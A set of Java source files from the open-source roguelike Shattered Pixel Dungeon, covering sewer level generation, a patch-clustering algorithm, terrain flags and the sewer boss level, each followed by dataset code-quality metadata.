* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.npcs.Ghost;
import com.shatteredpixel.shatteredpixeldungeon.effects.Ripple;
import com.shatteredpixel.shatteredpixeldungeon.items.DewVial;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.Painter;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.SewerPainter;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.AlarmTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.ChillingTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.ConfusionTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.FlockTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.OozeTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.ShockingTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.SummoningTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.TeleportationTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.ToxicTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.WornDartTrap;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.particles.Emitter;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.utils.ColorMath;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class SewerLevel extends RegularLevel {
{
color1 = 0x48763c;
color2 = 0x59994a;
}
@Override
protected int standardRooms() {
//5 to 7, average 5.57
return 5+Random.chances(new float[]{4, 2, 1});
}
@Override
protected int specialRooms() {
//1 to 3, average 1.67
return 1+Random.chances(new float[]{4, 4, 2});
}
@Override
protected Painter painter() {
return new SewerPainter()
.setWater(feeling == Feeling.WATER ? 0.85f : 0.30f, 5)
.setGrass(feeling == Feeling.GRASS ? 0.80f : 0.20f, 4)
.setTraps(nTraps(), trapClasses(), trapChances());
}
@Override
public String tilesTex() {
return Assets.TILES_SEWERS;
}
@Override
public String waterTex() {
return Assets.WATER_SEWERS;
}
@Override
protected Class<?>[] trapClasses() {
return Dungeon.depth == 1 ?
new Class<?>[]{ WornDartTrap.class } :
new Class<?>[]{ ChillingTrap.class, ShockingTrap.class, ToxicTrap.class, WornDartTrap.class,
AlarmTrap.class, OozeTrap.class,
ConfusionTrap.class, FlockTrap.class, SummoningTrap.class, TeleportationTrap.class };
}
@Override
protected float[] trapChances() {
return Dungeon.depth == 1 ?
new float[]{1} :
new float[]{8, 8, 8, 8,
4, 4,
2, 2, 2, 2};
}
@Override
protected void createItems() {
if (!Dungeon.LimitedDrops.DEW_VIAL.dropped()) {
addItemToSpawn( new DewVial() );
Dungeon.LimitedDrops.DEW_VIAL.drop();
}
Ghost.Quest.spawn( this );
super.createItems();
}
@Override
public Group addVisuals() {
super.addVisuals();
addSewerVisuals(this, visuals);
return visuals;
}
public static void addSewerVisuals( Level level, Group group ) {
for (int i=0; i < level.length(); i++) {
if (level.map[i] == Terrain.WALL_DECO) {
group.add( new Sink( i ) );
}
}
}
@Override
public String tileName( int tile ) {
switch (tile) {
case Terrain.WATER:
return Messages.get(SewerLevel.class, "water_name");
default:
return super.tileName( tile );
}
}
@Override
public String tileDesc(int tile) {
switch (tile) {
case Terrain.EMPTY_DECO:
return Messages.get(SewerLevel.class, "empty_deco_desc");
case Terrain.BOOKSHELF:
return Messages.get(SewerLevel.class, "bookshelf_desc");
default:
return super.tileDesc( tile );
}
}
private static class Sink extends Emitter {
private int pos;
private float rippleDelay = 0;
private static final Emitter.Factory factory = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
WaterParticle p = (WaterParticle)emitter.recycle( WaterParticle.class );
p.reset( x, y );
}
};
public Sink( int pos ) {
super();
this.pos = pos;
PointF p = DungeonTilemap.tileCenterToWorld( pos );
pos( p.x - 2, p.y + 3, 4, 0 );
pour( factory, 0.1f );
}
@Override
public void update() {
if (visible = (pos < Dungeon.level.heroFOV.length && Dungeon.level.heroFOV[pos])) {
super.update();
if ((rippleDelay -= Game.elapsed) <= 0) {
Ripple ripple = GameScene.ripple( pos + Dungeon.level.width() );
if (ripple != null) {
ripple.y -= DungeonTilemap.SIZE / 2;
rippleDelay = Random.Float(0.4f, 0.6f);
}
}
}
}
}
public static final class WaterParticle extends PixelParticle {
public WaterParticle() {
super();
acc.y = 50;
am = 0.5f;
color( ColorMath.random( 0xb6ccc2, 0x3b6653 ) );
size( 2 );
}
public void reset( float x, float y ) {
revive();
this.x = x;
this.y = y;
speed.set( Random.Float( -2, +2 ), 0 );
left = lifespan = 0.4f;
}
}
}
| 6,182 | SewerLevel | java | en | java | code | {"qsc_code_num_words": 728, "qsc_code_num_chars": 6182.0, "qsc_code_mean_word_length": 6.03021978, "qsc_code_frac_words_unique": 0.33104396, "qsc_code_frac_chars_top_2grams": 0.05535308, "qsc_code_frac_chars_top_3grams": 0.18177677, "qsc_code_frac_chars_top_4grams": 0.20045558, "qsc_code_frac_chars_dupe_5grams": 0.23872437, "qsc_code_frac_chars_dupe_6grams": 0.17722096, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0213558, "qsc_code_frac_chars_whitespace": 0.17437722, "qsc_code_size_file_byte": 6182.0, "qsc_code_num_lines": 220.0, "qsc_code_num_chars_line_max": 97.0, "qsc_code_num_chars_line_mean": 28.1, "qsc_code_frac_chars_alphabet": 0.83875392, "qsc_code_frac_chars_comments": 0.13345196, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.12962963, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00728019, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00597349, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.08024691, "qsc_codejava_score_lines_no_logic": 0.2654321, "qsc_codejava_frac_words_no_modifier": 0.92857143, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/Patch.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.watabou.utils.Random;
public class Patch {
/*
* fill is the initial seeded fill rate when creating a random boolean array.
*
* clustering is the number of clustering passes done on then array, to create patches.
* each clustering pass is basically a 3x3 mask filter but with rounding to true or false
* high clustering values will produce more concentrated patches,
* but any amount of clustering will rapidly push fill rates towards 1.0f or 0.0f
* The closer the fill rate is to 0.5f the weaker this pushing will be.
*
* forceFillRate adjusts the algorithm to force fill rate to be consistent despite clustering.
* this is achieved by firstly pulling the initial fill value towards 0.5f
* and then by manually filling in or emptying cells after clustering, until the fill rate is
* achieved. This is tracked with the fillDiff variable.
*/
public static boolean[] generate( int w, int h, float fill, int clustering, boolean forceFillRate ) {
int length = w * h;
boolean[] cur = new boolean[length];
boolean[] off = new boolean[length];
int fillDiff = -Math.round(length * fill);
if (forceFillRate && clustering > 0) {
fill += (0.5f - fill) * 0.5f;
}
for (int i=0; i < length; i++) {
off[i] = Random.Float() < fill;
if (off[i]) fillDiff++;
}
for (int i=0; i < clustering; i++) {
for (int y=0; y < h; y++) {
for (int x=0; x < w; x++) {
int pos = x + y * w;
int count = 0;
int neighbours = 0;
if (y > 0) {
if (x > 0){
if (off[pos - w - 1]) count++;
neighbours++;
}
if (off[pos - w]) count++;
neighbours++;
if (x < (w - 1)){
if (off[pos - w + 1]) count++;
neighbours++;
}
}
if (x > 0){
if (off[pos - 1]) count++;
neighbours++;
}
if (off[pos]) count++;
neighbours++;
if (x < (w-1)){
if (off[pos + 1]) count++;
neighbours++;
}
if (y < (h-1)) {
if (x > 0){
if (off[pos + w - 1]) count++;
neighbours++;
}
if (off[pos + w]) count++;
neighbours++;
if (x < (w-1)){
if (off[pos + w + 1]) count++;
neighbours++;
}
}
cur[pos] = 2*count >= neighbours;
if (cur[pos] != off[pos]) fillDiff += cur[pos] ? +1 : -1;
}
}
boolean[] tmp = cur;
cur = off;
off = tmp;
}
//even if force fill rate is on, only do this if we have some kind of border
if (forceFillRate && Math.min(w, h) > 2) {
int[] neighbours = new int[]{-w - 1, -w, -w + 1, -1, 0, +1, +w - 1, +w, +w + 1};
boolean growing = fillDiff < 0;
while (fillDiff != 0) {
int cell;
int tries = 0;
//random cell, not in the map's borders
// try length/10 times to find a cell we can grow from, and not start a new patch/hole
do {
cell = Random.Int(1, w - 1) + Random.Int(1, h - 1) * w;
tries++;
} while (off[cell] != growing && tries * 10 < length);
for (int i : neighbours) {
if (fillDiff != 0 && off[cell + i] != growing) {
off[cell + i] = growing;
fillDiff += growing ? +1 : -1;
}
}
}
}
return off;
}
}
| 4,061 | Patch | java | en | java | code | {"qsc_code_num_words": 587, "qsc_code_num_chars": 4061.0, "qsc_code_mean_word_length": 4.04258944, "qsc_code_frac_words_unique": 0.32879046, "qsc_code_frac_chars_top_2grams": 0.01011378, "qsc_code_frac_chars_top_3grams": 0.03034134, "qsc_code_frac_chars_top_4grams": 0.02275601, "qsc_code_frac_chars_dupe_5grams": 0.15086389, "qsc_code_frac_chars_dupe_6grams": 0.12810788, "qsc_code_frac_chars_dupe_7grams": 0.1011378, "qsc_code_frac_chars_dupe_8grams": 0.08259587, "qsc_code_frac_chars_dupe_9grams": 0.08175306, "qsc_code_frac_chars_dupe_10grams": 0.06995365, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02670829, "qsc_code_frac_chars_whitespace": 0.29007634, "qsc_code_size_file_byte": 4061.0, "qsc_code_num_lines": 143.0, "qsc_code_num_chars_line_max": 103.0, "qsc_code_num_chars_line_mean": 28.3986014, "qsc_code_frac_chars_alphabet": 0.79639265, "qsc_code_frac_chars_comments": 0.44397932, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.17857143, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.0, "qsc_codejava_score_lines_no_logic": 0.04761905, "qsc_codejava_frac_words_no_modifier": 0.0, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": null, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/Terrain.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
public class Terrain {
public static final int CHASM = 0;
public static final int EMPTY = 1;
public static final int GRASS = 2;
public static final int EMPTY_WELL = 3;
public static final int WALL = 4;
public static final int DOOR = 5;
public static final int OPEN_DOOR = 6;
public static final int ENTRANCE = 7;
public static final int EXIT = 8;
public static final int EMBERS = 9;
public static final int LOCKED_DOOR = 10;
public static final int PEDESTAL = 11;
public static final int WALL_DECO = 12;
public static final int BARRICADE = 13;
public static final int EMPTY_SP = 14;
public static final int HIGH_GRASS = 15;
public static final int FURROWED_GRASS = 30;
public static final int SECRET_DOOR = 16;
public static final int SECRET_TRAP = 17;
public static final int TRAP = 18;
public static final int INACTIVE_TRAP = 19;
public static final int EMPTY_DECO = 20;
public static final int LOCKED_EXIT = 21;
public static final int UNLOCKED_EXIT = 22;
public static final int SIGN = 23;
public static final int WELL = 24;
public static final int STATUE = 25;
public static final int STATUE_SP = 26;
public static final int BOOKSHELF = 27;
public static final int ALCHEMY = 28;
public static final int WATER = 29;
public static final int PASSABLE = 0x01;
public static final int LOS_BLOCKING = 0x02;
public static final int FLAMABLE = 0x04;
public static final int SECRET = 0x08;
public static final int SOLID = 0x10;
public static final int AVOID = 0x20;
public static final int LIQUID = 0x40;
public static final int PIT = 0x80;
public static final int[] flags = new int[256];
static {
flags[CHASM] = AVOID | PIT;
flags[EMPTY] = PASSABLE;
flags[GRASS] = PASSABLE | FLAMABLE;
flags[EMPTY_WELL] = PASSABLE;
flags[WATER] = PASSABLE | LIQUID;
flags[WALL] = LOS_BLOCKING | SOLID;
flags[DOOR] = PASSABLE | LOS_BLOCKING | FLAMABLE | SOLID;
flags[OPEN_DOOR] = PASSABLE | FLAMABLE;
flags[ENTRANCE] = PASSABLE/* | SOLID*/;
flags[EXIT] = PASSABLE;
flags[EMBERS] = PASSABLE;
flags[LOCKED_DOOR] = LOS_BLOCKING | SOLID;
flags[PEDESTAL] = PASSABLE;
flags[WALL_DECO] = flags[WALL];
flags[BARRICADE] = FLAMABLE | SOLID | LOS_BLOCKING;
flags[EMPTY_SP] = flags[EMPTY];
flags[HIGH_GRASS] = PASSABLE | LOS_BLOCKING | FLAMABLE;
flags[FURROWED_GRASS]= flags[HIGH_GRASS];
flags[SECRET_DOOR] = flags[WALL] | SECRET;
flags[SECRET_TRAP] = flags[EMPTY] | SECRET;
flags[TRAP] = AVOID;
flags[INACTIVE_TRAP]= flags[EMPTY];
flags[EMPTY_DECO] = flags[EMPTY];
flags[LOCKED_EXIT] = SOLID;
flags[UNLOCKED_EXIT]= PASSABLE;
flags[SIGN] = PASSABLE | FLAMABLE;
flags[WELL] = AVOID;
flags[STATUE] = SOLID;
flags[STATUE_SP] = flags[STATUE];
flags[BOOKSHELF] = flags[BARRICADE];
flags[ALCHEMY] = SOLID;
}
public static int discover( int terr ) {
switch (terr) {
case SECRET_DOOR:
return DOOR;
case SECRET_TRAP:
return TRAP;
default:
return terr;
}
}
//removes signs, places floors instead
public static int[] convertTilesFrom0_6_0b(int[] map){
for (int i = 0; i < map.length; i++){
if (map[i] == 23){
map[i] = 1;
}
}
return map;
}
}
| 4,102 | Terrain | java | en | java | code | {"qsc_code_num_words": 577, "qsc_code_num_chars": 4102.0, "qsc_code_mean_word_length": 4.88388215, "qsc_code_frac_words_unique": 0.3102253, "qsc_code_frac_chars_top_2grams": 0.17885025, "qsc_code_frac_chars_top_3grams": 0.24130589, "qsc_code_frac_chars_top_4grams": 0.28388928, "qsc_code_frac_chars_dupe_5grams": 0.14620298, "qsc_code_frac_chars_dupe_6grams": 0.01987225, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03207723, "qsc_code_frac_chars_whitespace": 0.21721112, "qsc_code_size_file_byte": 4102.0, "qsc_code_num_lines": 129.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 31.79844961, "qsc_code_frac_chars_alphabet": 0.84553099, "qsc_code_frac_chars_comments": 0.20258411, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00978294, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.0106383, "qsc_codejava_score_lines_no_logic": 0.06382979, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/SewerBossLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Bones;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.items.Heap;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.levels.builders.Builder;
import com.shatteredpixel.shatteredpixeldungeon.levels.builders.FigureEightBuilder;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.Painter;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.SewerPainter;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.Room;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.secret.RatKingRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.sewerboss.GooBossRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.sewerboss.SewerBossEntranceRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.sewerboss.SewerBossExitRoom;
import com.shatteredpixel.shatteredpixeldungeon.levels.rooms.standard.StandardRoom;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.Group;
import com.watabou.utils.Bundle;
import com.watabou.utils.Random;
import java.util.ArrayList;
public class SewerBossLevel extends SewerLevel {
{
color1 = 0x48763c;
color2 = 0x59994a;
}
private int stairs = 0;
@Override
protected ArrayList<Room> initRooms() {
ArrayList<Room> initRooms = new ArrayList<>();
initRooms.add( roomEntrance = new SewerBossEntranceRoom() );
initRooms.add( roomExit = new SewerBossExitRoom() );
int standards = standardRooms();
for (int i = 0; i < standards; i++) {
StandardRoom s = StandardRoom.createRoom();
//force to normal size
s.setSizeCat(0, 0);
initRooms.add(s);
}
GooBossRoom gooRoom = GooBossRoom.randomGooRoom();
initRooms.add(gooRoom);
((FigureEightBuilder)builder).setLandmarkRoom(gooRoom);
initRooms.add(new RatKingRoom());
return initRooms;
}
@Override
protected int standardRooms() {
//2 to 3, average 2.5
return 2+Random.chances(new float[]{1, 1});
}
protected Builder builder(){
return new FigureEightBuilder()
.setLoopShape( 2 , Random.Float(0.4f, 0.7f), Random.Float(0f, 0.5f))
.setPathLength(1f, new float[]{1})
.setTunnelLength(new float[]{1, 2}, new float[]{1});
}
@Override
protected Painter painter() {
return new SewerPainter()
.setWater(0.50f, 5)
.setGrass(0.20f, 4)
.setTraps(nTraps(), trapClasses(), trapChances());
}
protected int nTraps() {
return 0;
}
@Override
protected void createMobs() {
}
public Actor respawner() {
return null;
}
@Override
protected void createItems() {
Item item = Bones.get();
if (item != null) {
int pos;
do {
pos = pointToCell(roomEntrance.random());
} while (pos == entrance || solid[pos]);
drop( item, pos ).setHauntedIfCursed(1f).type = Heap.Type.REMAINS;
}
}
@Override
public int randomRespawnCell() {
int pos;
do {
pos = pointToCell(roomEntrance.random());
} while (pos == entrance || !passable[pos] || Actor.findChar(pos) != null);
return pos;
}
public void seal() {
if (entrance != 0) {
super.seal();
set( entrance, Terrain.WATER );
GameScene.updateMap( entrance );
GameScene.ripple( entrance );
stairs = entrance;
entrance = 0;
}
}
public void unseal() {
if (stairs != 0) {
super.unseal();
entrance = stairs;
stairs = 0;
set( entrance, Terrain.ENTRANCE );
GameScene.updateMap( entrance );
}
}
@Override
public Group addVisuals() {
super.addVisuals();
if (map[exit-1] != Terrain.WALL_DECO) visuals.add(new PrisonLevel.Torch(exit-1));
if (map[exit+1] != Terrain.WALL_DECO) visuals.add(new PrisonLevel.Torch(exit+1));
return visuals;
}
private static final String STAIRS = "stairs";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle( bundle );
bundle.put( STAIRS, stairs );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle( bundle );
stairs = bundle.getInt( STAIRS );
roomExit = roomEntrance;
}
}
| 4,999 | SewerBossLevel | java | en | java | code | {"qsc_code_num_words": 572, "qsc_code_num_chars": 4999.0, "qsc_code_mean_word_length": 6.34440559, "qsc_code_frac_words_unique": 0.37587413, "qsc_code_frac_chars_top_2grams": 0.0446404, "qsc_code_frac_chars_top_3grams": 0.16753927, "qsc_code_frac_chars_top_4grams": 0.18186828, "qsc_code_frac_chars_dupe_5grams": 0.29181593, "qsc_code_frac_chars_dupe_6grams": 0.24111325, "qsc_code_frac_chars_dupe_7grams": 0.11628548, "qsc_code_frac_chars_dupe_8grams": 0.06337834, "qsc_code_frac_chars_dupe_9grams": 0.06337834, "qsc_code_frac_chars_dupe_10grams": 0.06337834, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01737268, "qsc_code_frac_chars_whitespace": 0.15943189, "qsc_code_size_file_byte": 4999.0, "qsc_code_num_lines": 180.0, "qsc_code_num_chars_line_max": 94.0, "qsc_code_num_chars_line_mean": 27.77222222, "qsc_code_frac_chars_alphabet": 0.84626368, "qsc_code_frac_chars_comments": 0.16483297, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.13385827, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00143713, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00383234, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.1023622, "qsc_codejava_score_lines_no_logic": 0.31496063, "qsc_codejava_frac_words_no_modifier": 0.92857143, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, 